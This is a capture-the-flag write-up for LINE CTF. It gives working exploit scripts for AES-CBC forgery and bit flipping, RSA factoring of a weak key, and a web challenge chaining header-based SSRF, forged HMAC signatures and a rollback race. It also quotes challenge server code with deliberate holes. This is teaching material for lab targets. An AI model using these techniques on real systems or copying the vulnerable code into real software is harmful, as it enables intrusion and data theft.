Crypto
babycrypto1
nc 35.200.115.41 16001
This challenge was quite a ride! The solution we ended up using is more complicated than it should be, therefore we’ll provide both easy and alternative solution.
These first two crypto challenges are based on AES-CBC 128 cipher and involve some common attacks on this mode of operation.
As a reminder, this is the decryption scheme of CBC.
Here follows the script being served:
#!/usr/bin/env python
from base64 import b64decode
from base64 import b64encode
import socket
import multiprocessing
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import hashlib
import sys
class AESCipher:
def __init__(self, key):
self.key = key
def encrypt(self, data):
iv = get_random_bytes(AES.block_size)
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def encrypt_iv(self, data, iv):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return b64encode(iv + self.cipher.encrypt(pad(data,
AES.block_size)))
def decrypt(self, data):
raw = b64decode(data)
self.cipher = AES.new(self.key, AES.MODE_CBC, raw[:AES.block_size])
return unpad(self.cipher.decrypt(raw[AES.block_size:]), AES.block_size)
flag = open("flag", "rb").read().strip()
COMMAND = [b'test',b'show']
def run_server(client, aes_key, token):
client.send(b'test Command: ' + AESCipher(aes_key).encrypt(token+COMMAND[0]) + b'\n')
client.send(b'**Cipher oracle**\n')
client.send(b'IV...: ')
iv = b64decode(client.recv(1024).decode().strip())
client.send(b'Message...: ')
msg = b64decode(client.recv(1024).decode().strip())
client.send(b'Ciphertext:' + AESCipher(aes_key).encrypt_iv(msg,iv) + b'\n\n')
while(True):
client.send(b'Enter your command: ')
tt = client.recv(1024).strip()
tt2 = AESCipher(aes_key).decrypt(tt)
client.send(tt2 + b'\n')
if tt2 == token+COMMAND[1]:
client.send(b'The flag is: ' + flag)
client.close()
break
if __name__ == '__main__':
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 16001))
server.listen(1)
while True:
client, address = server.accept()
aes_key = get_random_bytes(AES.block_size)
token = b64encode(get_random_bytes(AES.block_size*10))[:AES.block_size*10]
process = multiprocessing.Process(target=run_server, args=(client, aes_key, token))
process.daemon = True
process.start()
That cipher oracle is a serious problem, since we’re allowed to use an arbitrary IV and Message, due to the CBC inner workings, we can change an already encrypted message.
Furthermore, we have an encrypted token + "test"
message and, luckily for us, the token ending coincides with a block ending. This means that the message is in a block of it’s own…
Knowing these two things, we give to the cipher oracle the IV of the block previous to the test
message and create a new block with the show
message.
from pwn import *
conn = remote('35.200.115.41', 16001)
log.info('get test command')
conn.recvuntil('test Command:' )
test_cmd_enc = b64d( conn.recvline().strip() )
iv = test_cmd_enc[:16]
enc_msg = test_cmd_enc[16:]
log.info('cipher oracle')
conn.sendline( b64e(enc_msg[144:160]) ) # iv
conn.sendline( b64e(b'show') ) # msg
conn.recvuntil('Ciphertext:')
ct_no_iv = b64d( conn.recvline().strip() )[16:]
log.info('forge command')
conn.sendline( b64e(iv + enc_msg[:160] + ct_no_iv) )
try:
while True: print(conn.recv())
except: conn.close()
And now, the creative alternative way… 😆
This challenge could also be solved without using the cipher oracle and instead applying a recursive Bit Flipping attack. On a side note, this attack is also the intended way to solve the the next challenge.
The idea is simple, in AES-CBC, modifying the ciphertext of a block is possible to change plaintext of the next block at the cost of garbling up the plaintext of the current block.
Conveniently for us:
-
There isn’t a limit to the decryptable messages
-
The IV can be changed since is used the one prepended to the message and not a fixed one
-
The initial encrypted message with the token and the test message can be sent back to retrieve the token
Going backwards we can modify the last block with show
instead of test
and take the xor of the resulting garbled token plaintext with the correct part of the token. Repeating this procedure we can modify the message and retrieve the flag.
from pwn import *
conn = remote('35.200.115.41', 16001)
log.info('get test command')
conn.recvuntil('test Command:' )
test_cmd_enc = b64d(conn.recvline().strip())
iv = test_cmd_enc[:16]
enc_msg = test_cmd_enc[16:]
log.info('skip cipher oracle')
conn.sendline('/0otYvyOVhXqYNOtTkiLpg==')
conn.sendline('show')
log.info('get token')
conn.recvuntil('command: ')
conn.sendline(b64e(test_cmd_enc))
test_cmd_dec = (conn.recvline().strip())
token = test_cmd_dec[:160]
# change test -> show in block #11
log.info('change command')
conn.recvuntil('command: ')
enc_msg = enc_msg[:144] + xor(xor('test', 'show'), enc_msg[144:148]) + enc_msg[148:]
conn.sendline(b64e(iv + enc_msg))
# Fix token for block #10 to #2
_log = log.progress('fix previous blocks')
for i in range(9):
_log.status(f'block {10-i}')
tmp_msg = conn.recvline().strip() # token + command
block_start_idx = (16*(9-i))
block_end_idx = (16*(9-i) + 16)
scramble_block = tmp_msg[block_start_idx : block_end_idx]
log.info(f"s: {scramble_block}")
token_block = token[block_start_idx : block_end_idx]
log.info(f"t: {token_block}")
fix_str = xor(scramble_block, token_block)
# xor the fix string to the ciphertext of the previous block
start_pre_block = block_start_idx -16
enc_msg = enc_msg[:start_pre_block] + xor(fix_str, enc_msg[start_pre_block:block_start_idx]) + enc_msg[block_start_idx:]
conn.recvuntil('command: ')
conn.sendline(b64e(iv + enc_msg))
_log.success('done')
log.info('change iv to fix first block')
tmp_msg = conn.recvline().strip() # token + command
scramble_block = tmp_msg[:16]
token_block = token[:16]
fix_str = xor(scramble_block, token_block)
conn.recvuntil('command: ')
conn.sendline(b64e(xor(iv, fix_str) + enc_msg))
try:
while True: print(conn.recv())
except: conn.close()
🏁 LINECTF{warming_up_crypto_YEAH}
babycrypto2
nc 35.200.39.68 16002
This is similar to the previous challenge babycrytpo1.
...
flag = open("flag", "rb").read().strip()
AES_KEY = get_random_bytes(AES.block_size)
TOKEN = b64encode(get_random_bytes(AES.block_size*10-1))
COMMAND = [b'test',b'show']
PREFIX = b'Command: '
def run_server(client):
client.send(b'test Command: ' + AESCipher(AES_KEY).encrypt(PREFIX+COMMAND[0]+TOKEN) + b'\n')
while(True):
client.send(b'Enter your command: ')
tt = client.recv(1024).strip()
tt2 = AESCipher(AES_KEY).decrypt(tt)
client.send(tt2 + b'\n')
if tt2 == PREFIX+COMMAND[1]+TOKEN:
client.send(b'The flag is: ' + flag)
client.close()
break
if __name__ == '__main__':
...
process = multiprocessing.Process(target=run_server, args=(client, ))
...
The Cipher Oracle is now gone and the only thing we can change is the IV of the message since it’s still read from the first 16 bytes of the sent message.
Previously the command was appended as the last block, now it’s at the beginning after a prefix PREFIX = b'Command: '
.
Observe that the PREFIX + command
are well within the 16 bytes limit of the first block.
Using the Bit Flipping Attack we can modify the IV to change the test
bytes in the first block to show
, without having to worry about messing up previous blocks.
from base64 import b64decode, b64encode
test_cmd = "b64encoded_received_msg"
msg = list(b64decode(test_cmd))
msg[9] ^= (ord('t')^ord('s')) # t > s
msg[10] ^= (ord('e')^ord('h')) # e > h
msg[11] ^= (ord('s')^ord('o')) # s > o
msg[12] ^= (ord('t')^ord('w')) # t > w
print( b64encode(bytes(msg)) )
🏁 LINECTF{echidna_kawaii_and_crypto_is_difficult}
babycrypto3
Please decrypt and get flag.
Flag is LINECTF{<decrypted text>} and decrypted text is human-readable text.
-----BEGIN PUBLIC KEY-----
ME0wDQYJKoZIhvcNAQEBBQADPAAwOQIyAyixQTmi5UuIpGYvGmfMOs0ZKcm2J5S7
ZJFq/wKZH4BFbk0O7U1ZHfdwjVry6bT7VokCAwEAAQ==
-----END PUBLIC KEY-----
Here we have a public key with a related ciphertext.
RsaCtfTool to the help… In fact, after a few minutes we find that the SageMath payload cm_factor
succeeded!
$ py RsaCtfTool.py --publickey pub.pem --uncipherfile ciphertext.txt --attack cm_factor
...
[*] Attack success with cm_factor method !
...
STR : b'\x00\x02`g\xff\x85\x1e\xcd\xcba\xe5\x0b\x83\xa5\x15\xe3\x00Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==\n'
$ echo "Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==" | base64 -d
CLOSING THE DISTANCE.
🏁 LINECTF{CLOSING THE DISTANCE.}
Web
diveinternal
Target the server’s internal entries, access admin, and roll back.
Keytime: Asia/Japan
http://xxx.xxx.xxx.xxx/
After navigating to the challenge’s IP, we are presented with a page that contains what looks like a crypto ticker, refreshing every five seconds.
The About page doesn’t contain anything interesting at first glance, and the Subscribe page lets us enter an email address and replies with a simple text-only confirmation.
So, given the challenge’s description, we should:
- Target the server’s internal entries
- Access admin
- Roll back
…whatever those mean. Luckily enough the source code for the challenge was given, and the team at LINE was nice enough to package everything up in Docker containers and provide a docker-compose config to reproduce their deployment on your machine. Here’s a relevant excerpt (screen space is a premium resource):
services:
nginx:
build:
context: ./nginx/
ports:
- "12004:80"
networks:
- ctf-network
public:
build:
context: ./public/
networks:
- ctf-network
private:
build: ./private/
networks:
- ctf-network
environment:
- 'RUN=flask run --host=0.0.0.0 --port=5000'
- DBFILE=database/master.db
networks:
ctf-network:
So, what do we have here? First things first, let’s note that all the services will be running unrestricted in a common virtual network, so they’ll be reachable from each other by using their service name as hostname.
An NGINX instance that reverse-proxies the public
container, judging by the config in its build dir:
server {
location / {
proxy_pass http://public:3000;
}
}
Note: the complete config file had several more Lua shenanigans messing with caching and headers formatting, none of which I’ve recognized as useful for solving this challenge but may have given additional insights. If anything, some headers rewriting could have been needed to actually make the intended exploit work.
Next we have the public
service, which apparently is just a frontend that calls to the private
backend. Here are the relevant routes definitions, with context added where needed:
const target = 'private:5000';
router.get('/apis/', function(req, res, next) {
request({
headers: req.headers,
uri: `http://${target}/`,
}, function(err, data){
res.render('index', { title: 'apis' , data: data.body});
});
});
router.get('/apis/addsub', function(req, res, next) {
request({
uri: `http://${target}/addsub`,
qs: { email: req.query.email }
}).pipe(res);
});
We can already see that the only ways we have to interact with the private backend are through GETting its root with some headers or through an email
query parameter directed at the addsub
endpoint.
Cutting to the juicy bits, here’s a portion of the private
service, rewritten and minimized as needed (that is to say: don’t try to paste this in an interpreter, it won’t work):
privateKey = b'let\'sbitcorinparty'
class Activity():
def __init__(self):
self.dbHash = hashlib.md5(open('database/master.db','rb').read()).hexdigest()
self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()
def IntegrityCheck(self,key, dbHash):
if self.integrityKey != key:
# Return invalid key error
if self.dbHash != dbHash:
flag = RunRollbackDB(dbHash)
file = open('database/master.db','rb').read()
self.dbHash = hashlib.md5(file).hexdigest()
self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()
return flag
return "DB is safe!"
def run(self):
schedule.every(6).seconds.do(self.IntegrityCheck)
schedule.every(2).seconds.do(self.UpdateIntegrityKey)
schedule.every(2).seconds.do(self.BackupDB)
def WriteFile(url):
local_filename = url.split('/')[-1]
with requests.get(url, stream=True) as r:
with open('backup/'+local_filename, 'wb') as f:
# Write the contents of the response in the file
def LanguageNomarize(request):
if request.headers.get('Lang') is None:
return "en"
else:
regex = '^[!@#$\\/.].*/.*' # Easy~~
language = request.headers.get('Lang')
language = re.sub(r'%00|%0d|%0a|[!@#$^]|\.\./', '', language)
if re.search(regex,language):
return request.headers.get('Lang')
try:
data = requests.get(request.host_url+language, headers=request.headers)
if data.status_code == 200:
return data.text
else:
return request.headers.get('Lang')
except:
return request.headers.get('Lang')
def SignCheck(request):
sigining = hmac.new(privateKey , request.query_string, hashlib.sha512)
return sigining.hexdigest() == request.headers.get('Sign')
@app.route('/en', methods=['GET'])
def en():
return 'en'
@app.route('/coin', methods=['GET'])
def coin():
response = app.response_class()
language = LanguageNomarize(request)
response.headers["Lang"] = language
data = getCoinInfo()
response.data = json.dumps(data)
return response
@app.route('/download', methods=['GET'])
def download():
if !SignCheck(request):
# Return invalid signing key error
src = request.args.get('src')
if src == None:
# Return missing resource error
WriteFile(src)
# Return success message
@app.route('/addsub', methods=['GET'])
def addsub():
regex = '^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$'
email = request.args.get('email')
if (email is None) or (len(email)>100):
# Return invalid email error
if re.search(regex,email):
# Add subscriber to DB and return success message
else:
# Return invalid email error
@app.route('/integrityStatus', methods=['GET'])
def integritycheck():
data = {'db':'database/master.db','dbhash':activity.dbHash}
return json.dumps(data)
@app.route('/rollback', methods=['GET'])
def rollback():
if !SignCheck(request):
# Return invalid signing key error
if request.headers.get('Key') == None:
# Return invalid key error
result = activity.IntegrityCheck(request.headers.get('Key'),request.args.get('dbhash'))
return result
def RunRollbackDB(dbhash):
if dbhash is None:
return "dbhash is None"
dbhash = ''.join(e for e in dbhash if e.isalnum())
if os.path.isfile('backup/'+dbhash):
with open('FLAG', 'r') as f:
flag = f.read()
return flag
else:
return "Where is file?"
def RunbackupDB(remove, dbhash):
subprocess.Popen(r'rm backup/*' , shell=True).wait()
subprocess.Popen(r'cp ' + 'database/master.db' + ' backup/' + dbhash, shell=True).wait()
return dbhash
Summarizing a couple of things:
- Every few seconds a background thread updates the
integrityKey
and thedbHash
, both derived from the MD5 sum of the current contents of the DB.- We can get the base hash from the
/integrityStatus
endpoint and calculate the rest by copying the service’s code.
- We can get the base hash from the
- Likewise, we can sign our own requests since we have the code of the
SignCheck
function as well as the private key used in it. - To get the flag, we have to call the
RunRollbackDB
function somehow, passing it the name of a file that exists in the/backup
folder.- A background worker cleans that directory every couple of seconds and puts there a backup of the current DB.
- Since
IntegrityCheck
only lets us roll back to a version of the DB that does not match the current hash, we can’t trigger a rollback with only the infos that/integrityStatus
gives us.
- The
LanguageNomarize
parser tries to resolve an URL that includes a user-controlled segment.- We can leverage that from the
/coin
endpoint. - A filtering RegEx prevents HTTP request hijacks based on carriage returns and newlines.
- We can leverage that from the
From these observations, a rather weird path to exploitation can be devised:
- SSRF via the
Lang
header in the/apis/coin
endpoint of the public service.- Hijack the target host to
private:5000
via theHost
header.
- Hijack the target host to
- Obtain
dbHash
from/integrityStatus
.- Use it to calculate
Sign
(affected by query string) andKey
(affected by DB contents) headers as needed.
- Use it to calculate
- Make the API “download itself” in the backup directory by calling the private
/download
endpoint, usinghttp://localhost:5000/integrityStatus
to generate some data.- This will create a file named “integrityStatus” in the backup directory that will exist until the next scheduled cleanup cycle. The content of such file aren’t important, any other endpoint could have been used.
- Use the name of the downloaded file to trigger a rollback through the private
/rollback
endpoint. - If all went well, the
Lang
header of the response should be populated with the flag.- Since this attack depends on exact timings and the environment is shared between all the CTF participants, it may take a few tries to succeed in a live environment.
#!/usr/bin/env python3
import hashlib, hmac, json, requests
HOST = 'xxx.xxx.xxx.xxx'
# Pulled from /private/app/main.py @ L21
privateKey = b'let\'sbitcorinparty'
# Pulled from /private/app/main.py @ L61
def integrityKey(dbHash):
retVal = hashlib.sha512((dbHash).encode('ascii')).hexdigest()
return retVal
# Pulled from /private/app/main.py @ L152
def sign(query):
retVal = hmac.new(privateKey, query.encode('ascii'), hashlib.sha512).hexdigest()
return retVal
if __name__ == '__main__':
i = 1
while True:
print(f'Try #{i}...', end='\r')
# Get the hash of the current DB
response = requests.get(f'http://{HOST}/apis/coin', headers={
'Host': 'private:5000',
'Lang': 'integrityStatus',
})
dbHash = json.loads(response.headers['lang'])['dbhash']
# Make the API download itself in the backup dir
query = 'src=http%3A%2F%2Flocalhost%3A5000%2FintegrityStatus'
response = requests.get(f'http://{HOST}/apis/coin', headers={
'Host': 'private:5000',
'Lang': f'download?{query}',
'Sign': sign(query)
})
# Use the name of the downloaded file to trigger a rollback
query = 'dbhash=integrityStatus'
response = requests.get(f'http://{HOST}/apis/coin', headers={
'Host': 'private:5000',
'Lang': f'rollback?{query}',
'Sign': sign(query),
'Key': integrityKey(dbHash)
})
# Multiple tries may be needed due to regular backup dir cleanup
reply = response.headers['lang']
if 'LINECTF{' in reply:
print(f'Flag found! {reply}')
break
else:
print(f'Wrong timing, retrying (\'{reply}\')')
i += 1
This challenge had quite a bit of distractions and dead ends built in but in the end, as usual, the working exploit turned out to be conceptually simple.
🏁 LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}